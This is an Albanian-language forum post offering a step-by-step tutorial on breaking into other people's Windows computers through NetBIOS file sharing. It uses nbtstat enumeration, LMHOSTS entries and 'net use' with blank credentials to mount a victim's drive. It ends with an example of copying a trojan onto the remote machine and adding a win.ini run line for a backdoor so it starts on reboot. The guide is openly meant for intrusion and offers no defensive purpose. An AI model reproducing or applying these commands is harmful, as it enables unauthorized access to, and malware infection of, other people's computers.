..::7/4::..
Would you like to react to this message? Create an account in a few clicks or log in to continue.

..::7/4::..

MiR sErDhEt
 
ForumPortaliGalleryLatest imagesKërkoRegjistrohuidentifikimi

 

 HACKIMI I PC - SUAJ

Shko poshtë 
AutoriMesazh
Exp!ress-Riard
Admin
Exp!ress-Riard


Numri i postimeve : 335
Join date : 23/05/2009

HACKIMI I PC - SUAJ Empty
MesazhTitulli: HACKIMI I PC - SUAJ   HACKIMI I PC - SUAJ I_icon_minitimeFri Jun 05, 2009 11:31 pm

Windowsi ka opcionin të cilin pothuajse të gjith e dijnë dhe quhet" file and
print sharing". Shumica nga ju ndoshta nuk dijn si ta shfrytzojn në raste se
edhe ndokush e ka të kyqur këtë opcion. Juve qe nuk dini po ja mundësoj mësimin
reth këtij opcioni me vlerë. Kjo shtojcë shërben për rjetat (psh. LAN e cila
rjetë përdoret në internet klube,shkolla, bredband e tj ), që do të thot se gjdo
kush në këtë rjetë mund të shef direktoriumin e caktuar, të hyn në te dhe të i
mer te gjitha qka i nevoiten nga ai direktorium apo të përshkuaj të gjitha në
printer. Kur e kyqni këtë opcion në kompjuterin e juaj hapet porti nr 139 i cili
pranon dhe dergon protokole të tipit "NetBIOS" gjë që mund të jet e dobishme në
LAN rjetat. Nuk duhet printer per gjdo kompjuter por perdoret vetem një, skemi
nevoj në secilin kompjuter te montojm ! GB muzikë mjafton ta bejm këte në njerin
nga to dhe fitojm mundesin e hyrjes në atë folder. Por ne raste se ky kompjuter
asht i kyqyr ne internet këtu lind problemi se gjdo njeni qe e din IP adresen
mund të depertoj në atë kompjuter. Të kalojmë pra në akcion:.
File Sharing Port është porti nr 139 quhet ndryshe edhe NetBIOS Session Service
port. Kur e keni të kyqur këtë opcion atëherë pran këtij porti hapen edhe dy të
tjera që shfrytzojn UDP protokolin, dhe këto janë porti nr 137 (Name Service)
dhe 138 (Datagram Service) E tani ata qe kan pak njohuri ne DOS sulme, dijn që
për këto porte esht bërë një numër i madh i programeve të ashtuquajtura nuckerët
të cilat dërgojn një mori të të dhënave te panevojshme në këto porte dhe
shkatrojnë lidhjen e shfrytzuesit e tj. Ky text nuk do të miret me ketë lloj të
sulmit por megjera më të dobishme. Në këtë text do të ju mësoj se si te
depertoni në një kompjuter të tillë. E tëra që ju nevoitet gjendet ne windows .
Në njeren nga metodat mund te shfrytzohemi me shkrim në tastaturë dhe për GUI
per ata qe s'dijn qka do te thot GUI qe edhe spjegimi GUI = Graphical User
Interface . Programet qe ju nevoiten janë Nbtstat.exe dhe Net.exe Mund të i
gjeni nëWindows direktorium. Këto programe startohen në MS-DOS Prompt Për ta par
ndihmen për këto programe në DOS Prompt shkruani emrin e tyre dhe komanden /?
(Net /? ose NbStat /?) Duhet ta dijme se ka kompjuter ne internet te cilat nuk e
kan të kyqur File and Printer shering opcionin por prapse prap kan portin 139 te
hapur. Pra keta kan te startuar ndonjë Firewall ose NetBuster apo diqka te
ngjajshme për mbrojtje.
Tani kur e keni te gadshëm NbtStat.exe-n e juaj mund ta shfrytzoni IP ose
host-in e komjuterit ne të cilin dëshironi të depertoni-ta theni.
Pra po supozojme se keni host-in e kompjuterit me emrin psh: www bukuroshja
ime.com ndersa IP adresa është 195.222.32.15 E para që duhet ta beni është të
shiqoni a e ka ky kompjuter të kyqur opcionin " file and printer sharing". Si?
Në MS DOS Prompt (auuuuuuu qka e due shum DOS-in) shkruani nbtstat -ndersa
hostname në shembullin tonë është: nbtstat -a www.bukuoshja ime.com por në rastë
se dëshironi ta përdorni IP adresen atëherë shkruani nbtstat -A IP në rastin
tonë: nbtstat -A 195.222.32.15
dallimi është në germen (a) të vogël dhe të madhe( A.) këtu mund te i merni dy
përgjegje të ndryshme, njena është "Host Not Found". Në rastese e merni këte
përgjegje mundeni meniher ta nderpreni tentimin e thyerjes se këtij kompjuteri,
sepse ai kompjuter nuk e ka te kyqur NetBIOS protokolin ose keni shkruar IP
adresen e gabuar. Në rastin tjeter e merni një tabelë të bukur me kolonat Name,
Type dhe Status në këtë rast keni patur sukses) Në rastëse e keni mar këtë
pergjegje të dytë jeni në gjysmen e rugës për ta thyer at kompjuter. Tabela
duhet te duket kështu përafërsisht:

Name Type Status
-----------------------------------------------------------------------------
Host <20> UNIQUE Registered
Hostbug <00> GROUP Registered
Host machine <03> UNIQUE Registered

-----------------------------------------------------------------------------
Në rastëse dëshironi ta shifni tabelen e juaj personaleatëherë shkruani nbtstat
-n
Vlera brenda shenjave <> mund të jetë
00 base computernames and workgroups, also in "*" queries
01 master browser, in magic __MSBROWSE__ cookie
03 messaging/alerter service; name of logged-in user
20 resource-sharing "server service" name
1B domain master-browser name
1C domain controller name
1E domain/workgroup master browser election announcement
Nuk e përktheva me qëllim se e humb domethanjen.
Pra në rastese vlera është 20 (te ju them që të gjitha vlerat janë në formën
hexadecimale) do të thot që ky folder lejon hyrjen. Pra si ta thejm dhe ta marim
përmbajtjen e këtij folderi apo drajverit- pa mar parasysh se qka është? Së pari
brenda Lmhosts filit duhet të krijoni hyrjen e re. (Lmhosts filin mund ta gjeni
në folderin ku e ka vendin e kjo është C:\windows\Lmhosts natyrisht pa vazhdim)
Poashtu egziston edhe shembulli i Lmhost filit që gjendet në c:\windows\Lmhosts.sam
por ky shembull nuk është fil të cilin duhet ju të editoni(ka prapashtesën sam,
pra vetem filet qe skan atë prapashtesë) Nëraste se skeni Lmhost filin thjesht
krijojeni. Lexoni edhe disa informata nga Lmhost.sam fili në rastëse nuk e keni
mund ta lexoni nga ky text:
--- Lmhosts.sam fili ---
# Copyright (c) 1993-1995 Microsoft Corp.
#
# This is a sample LMHOSTS file used by the Microsoft TCP/IP for Windows
# NT.
#
# This file contains the mappings of IP addresses to NT computernames
# (NetBIOS) names. Each entry should be kept on an individual line.
# The IP address should be placed in the first column followed by the
# corresponding computername. The address and the comptername
# should be separated by at least one space or tab. The "#" character
# is generally used to denote the start of a comment (see the exceptions
# below).
#
# This file is compatible with Microsoft LAN Manager 2.x TCP/IP lmhosts
# files and offers the following extensions:
#
# #PRE
# #DOM:
# #INCLUDE
# #BEGIN_ALTERNATE
# #END_ALTERNATE
# \0xnn (non-printing character support)
#
# Following any entry in the file with the characters "#PRE" will cause
# the entry to be preloaded into the name cache. By default, entries are
# not preloaded, but are parsed only after dynamic name resolution fails.
#
# Following an entry with the "#DOM:" tag will associate the
# entry with the domain specified by . This affects how the
# browser and logon services behave in TCP/IP environments. To preload
# the host name associated with #DOM entry, it is necessary to also add a
# #PRE to the line. The is always preloaded although it will not
# be shown when the name cache is viewed.
#
# Specifying "#INCLUDE " will force the RFC NetBIOS (NBT)
# software to seek the specified and parse it as if it were
# local. is generally a UNC-based name, allowing a
# centralized lmhosts file to be maintained on a server.
# It is ALWAYS necessary to provide a mapping for the IP address of the
# server prior to the #INCLUDE. This mapping must use the #PRE directive.
# In addtion the share "public" in the example below must be in the
# LanManServer list of "NullSessionShares" in order for client machines to
# be able to read the lmhosts file successfully. This key is under
#
\machine\system\currentcontrolset\services\lanmans erver\parameters\nullsessionshares
# in the registry. Simply add "public" to the list found there.
#
# The #BEGIN_ and #END_ALTERNATE keywords allow multiple #INCLUDE
# statements to be grouped together. Any single successful include
# will cause the group to succeed.
#
# Finally, non-printing characters can be embedded in mappings by
# first surrounding the NetBIOS name in quotations, then using the
# \0xnn notation to specify a hex value for a non-printing character.
#
# The following example illustrates all of these extensions:
#
# 102.54.94.97 rhino #PRE #DOM:networking #net group's DC
# 102.54.94.102 "appname \0x14" #special app server
# 102.54.94.123 popular #PRE #source server
# 102.54.94.117 localsrv #PRE #needed for the
include
#
# #BEGIN_ALTERNATE
# #INCLUDE \\localsrv\public\lmhosts
# #INCLUDE \\rhino\public\lmhosts
# #END_ALTERNATE
#
# In the above example, the "appname" server contains a special
# character in its name, the "popular" and "localsrv" server names are
# preloaded, and the "rhino" server name is specified so it can be used
# to later #INCLUDE a centrally maintained lmhosts file if the "localsrv"
# system is unavailable.
#
# Note that the whole file is parsed including comments on each lookup,
# so keeping the number of comments to a minimum will improve performance.
# Therefore it is not advisable to simply add lmhosts file entries onto the
# end of this file.
---------Fundi i Lmhost.sam filit------------
Për të krijuar hyrjen në Lmhost filin thjesht hapeni at fil në text editorin e
juaj ( notepad, Wordpad word etj.) Shkruani IP numrin e kompjuterit klikoni në
pullen Tab shkruani Name (kjo është nga ajo informatë të cilën e morët në tabelë
,në shembullin tonë është "Host") memoroni filin(ruani) dhe thjesht mbylleni. E
tani i kemi mënyrat e depërtimit,mënyrën e lehtë dhe të vështirë (cool mënyra ))
Këshillë: Msoini të dy mënyrat.
---- (GUI) mënyra- mënyra e lehtë -----
N'rastëse nuk doni te mundoheni ma shum klikoni ne Start pastaj në Find dhe
zgjedheni Computer... Në rastëse i keni futur te dhenat ne Lmhost si duhet ju
paraqitet kompjuteri të cilin dëshironi ta theni dhe thjesht filloni hulumtimin
në te në të njejtin mënyrë siq hulumtoni në kompjuterin e juaj
--- (cool) Mënyra- mënyra e vështirë--------
Për këtë ju duhet dituri me punen e programit Net.exe Për ndihmë shkruani në
MS-DOS Prompt:
Net.exe /?
Ju këdhilloj që tër filin e ndihmes ta memoroni në ndonjë txt fil për ta mund ta
lexoni më lehtë këte e bëni duke shkruar Net.exe /? >> C:\windows\desktop\net_ndihmë.txt
Pra ky text placohet në lokacionin C:\windows\desktop dhe emri i tij do të jetë
net_ndihmë.txt tani krijoni një drajv virtual Për ta bërë këtë duhet të shkruani:
net use drive \\[ipadresa]\[Name] /user:
Ku është drive te cilin dëshironi me pa/krijuar psh g: p: l: z: (unë
personalisht përdori z
ip adresa është ip adresa e kompjuterit qe doni ta theni
Name është ajo informat nga Tabele që fituat (në rastin tonë është "Host")
Ju mbetet vetëm të shkruani emrin e drajvit të juaj të ri dhe të surfoni në te
si me pas qen i juaji , e permbajtja e saj do të jetë përmbajtja e tërë e
kompjuterit të thyer . (natyrisht shfrytzonie MS-DOS) Po thojm që keni zgjedhur
qe driveri i juaj te quhet Z: shkruani Z: dhe surfoni )

Qe një shembull:
Po supozojmë që keni një trojan qe gjendet në kompjuterin e juaj në C:\ dhe
quhet trojan.exe e tani dëshironi që në kompjuterin e huaj ta startoni këtë
trojan.
Keni këtë situatë:
IP adresa: 195.222.37.42
Dhe emri folder (Name) është: Budalla
Startoni MS-DOS Prompt dhe shkruani:
net use z: \\195.222.37.42\Budalla "" /user: ""
Tani nevoitet ta kopjoni trojanin në drajv z:
Shkruani copy C:\trojan.exe z:\trojan.exe
Mos gaboni me ba si me poshtë::
Ta ndroni drajv-in me komandom z: dhe të shkruani trojan.exe sepse startoni
trojanin në kompjuterin e juaj .
Editoni win.ini filin dhe shtoni vijen
run=%SystemRoot%\backdoor.exe
Kjo është e tëra pas ristartimit të kompjuterit trojani fillon të lëviz.
Mbrapsht në krye Shko poshtë
https://expries.albanianforum.net
 
HACKIMI I PC - SUAJ
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
..::7/4::..  :: programe per windovs-
Kërce tek: